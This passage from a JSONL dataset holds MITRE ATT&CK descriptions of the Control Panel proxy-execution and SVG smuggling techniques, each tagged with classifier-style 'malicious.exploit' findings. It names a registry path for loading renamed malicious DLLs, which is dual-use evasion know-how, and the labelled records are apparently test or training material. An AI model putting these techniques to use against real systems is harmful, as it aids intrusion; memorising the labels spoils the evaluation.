"fields": {"technique_id": "T1212", "technique_name": "Exploitation for Credential Access", "tactics": ["credential-access"]}}]}
{"id": "mitre_00625", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Control Panel\n\nTechnique: T1218.002\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1218.002", "technique_name": "Control Panel", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00626", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SVG Smuggling\n\nTechnique: T1027.017\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `